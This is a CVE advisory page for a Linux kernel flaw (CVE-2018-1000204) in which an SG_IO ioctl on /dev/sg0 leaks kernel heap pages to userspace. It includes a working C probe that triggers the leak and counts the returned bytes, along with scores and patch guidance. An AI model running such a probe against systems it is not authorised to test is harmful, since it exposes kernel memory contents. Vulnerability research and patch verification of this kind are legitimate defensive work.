CVE-2018-1000204

Description

Linux Kernel versions 3.18 to 4.16 incorrectly handle an SG_IO ioctl on /dev/sg0 with dxfer_direction=SG_DXFER_FROM_DEV and an empty 6-byte cmdp. This may lead to copying up to 1000 kernel heap pages to userspace. This has been fixed upstream in https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824. The problem has limited scope, as users don't usually have permission to access SCSI devices. On the other hand, e.g. the Nero user manual suggests doing `chmod o+r+w /dev/sg*` to make the devices accessible. NOTE: third parties dispute the relevance of this report, noting that the requirement for an attacker to have both the CAP_SYS_ADMIN and CAP_SYS_RAWIO capabilities makes it "virtually impossible to exploit."
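The request the description refers to, as an added example (not code from the advisory, the reporter or the kernel project): a small C probe that issues exactly that SG_IO call and counts how many bytes of the data buffer come back non-zero. It assumes a SCSI generic device at /dev/sg0 (override with the first argument), that the caller may open it for writing, and that "empty 6-byte cmdp" means a CDB of six zero bytes; with such a command no device data is expected, so on a kernel carrying the upstream fix the buffer should come back all zeros, while a vulnerable kernel returns stale page contents. On a default system the open or the ioctl fails with EACCES/EPERM, which is the access restriction the description mentions.

```c
/* Added example, not part of the advisory or the kernel. Assumptions:
   /dev/sg0 exists and is openable, and the "empty" 6-byte CDB is all zeros. */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <scsi/sg.h>

/* Fill an sg_io_hdr for the request in the advisory: SG_DXFER_FROM_DEV with a
   6-byte, all-zero CDB and a caller-supplied data buffer of 'len' bytes. */
void build_sg_request(struct sg_io_hdr *io, unsigned char *cdb, size_t cdb_len,
                      unsigned char *buf, size_t len,
                      unsigned char *sense, size_t sense_len)
{
    memset(io, 0, sizeof *io);
    memset(cdb, 0, cdb_len);            /* "empty" CDB: six zero bytes (assumed) */
    io->interface_id = 'S';
    io->dxfer_direction = SG_DXFER_FROM_DEV;
    io->cmd_len = (unsigned char)cdb_len;
    io->cmdp = cdb;
    io->dxferp = buf;
    io->dxfer_len = (unsigned int)len;  /* how much the kernel copies back to us */
    io->sbp = sense;
    io->mx_sb_len = (unsigned char)sense_len;
    io->timeout = 5000;                 /* milliseconds */
}

/* Count bytes that are no longer zero. The buffer is primed with zeros before
   the ioctl, so any non-zero byte was written by the kernel: a patched kernel
   hands back zeroed pages, a vulnerable one whatever the pages last held. */
size_t count_nonzero(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] != 0)
            n++;
    return n;
}

/* Returns the number of non-zero bytes returned by the kernel, or -1 if the
   device could not be opened or the ioctl failed (e.g. EACCES on a device
   still restricted to root, or ENOENT when no sg device is present). */
long probe_sg_leak(const char *dev, size_t len)
{
    unsigned char cdb[6], sense[32];
    struct sg_io_hdr io;
    long result = -1;
    unsigned char *buf = calloc(len, 1);   /* zero-filled on purpose */
    if (!buf)
        return -1;
    int fd = open(dev, O_RDWR);
    if (fd < 0) {
        perror(dev);
        free(buf);
        return -1;
    }
    build_sg_request(&io, cdb, sizeof cdb, buf, len, sense, sizeof sense);
    if (ioctl(fd, SG_IO, &io) == 0)
        result = (long)count_nonzero(buf, len);
    else
        perror("SG_IO");
    close(fd);
    free(buf);
    return result;
}

int main(int argc, char **argv)
{
    const char *dev = argc > 1 ? argv[1] : "/dev/sg0";
    size_t len = 64 * 1024;   /* 16 pages; the report says up to 1000 can leak */
    long n = probe_sg_leak(dev, len);
    if (n < 0)
        return 1;
    printf("%s: %ld of %zu buffer bytes non-zero after SG_IO\n", dev, n, len);
    return 0;
}
```

Run it as root (or as a user who has been granted access to /dev/sg*) on a kernel in the affected range versus a patched one; the difference in the non-zero count is the leak. A high count on a patched kernel means the device actually returned data, so check the sense buffer and io.status before drawing conclusions.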

CVSS score: 5.3 (Medium)
EPSS: 0.13%

References

Vendor advisories: ubuntu.com, redhat.com, opensuse.org
Upstream fix: https://github.com/torvalds/linux/commit/a45b599ad808c3c982fdcdc12b0b8611c2f92824
Frequently Asked Questions

What is the severity of CVE-2018-1000204?
CVE-2018-1000204 has been scored as a medium severity vulnerability.
How to fix CVE-2018-1000204?
To fix CVE-2018-1000204, upgrade to a kernel that contains the upstream fix commit referenced in the description (a45b599ad808c3c982fdcdc12b0b8611c2f92824) or your distribution's backport of it; check the vendor advisories above for the patched package versions. Until then, keep /dev/sg* devices restricted to root and do not apply the `chmod o+r+w /dev/sg*` that some third-party manuals suggest, since that is what turns this into a problem for unprivileged local users.
Is CVE-2018-1000204 being actively exploited in the wild?
At present there is no information confirming that CVE-2018-1000204 is being actively exploited. According to its EPSS score (0.13%), there is a ~0% probability that this vulnerability will be exploited by malicious actors in the next 30 days.
This platform uses data from the NIST NVD, MITRE CVE, MITRE CWE, First.org and CISA KEV but is not endorsed or certified by these entities. CVE is a registered trademark of the MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. CWE is a registered trademark of the MITRE Corporation and the authoritative source of CWE content is MITRE's CWE web site.
© 2025 Under My Watch. All Rights Reserved.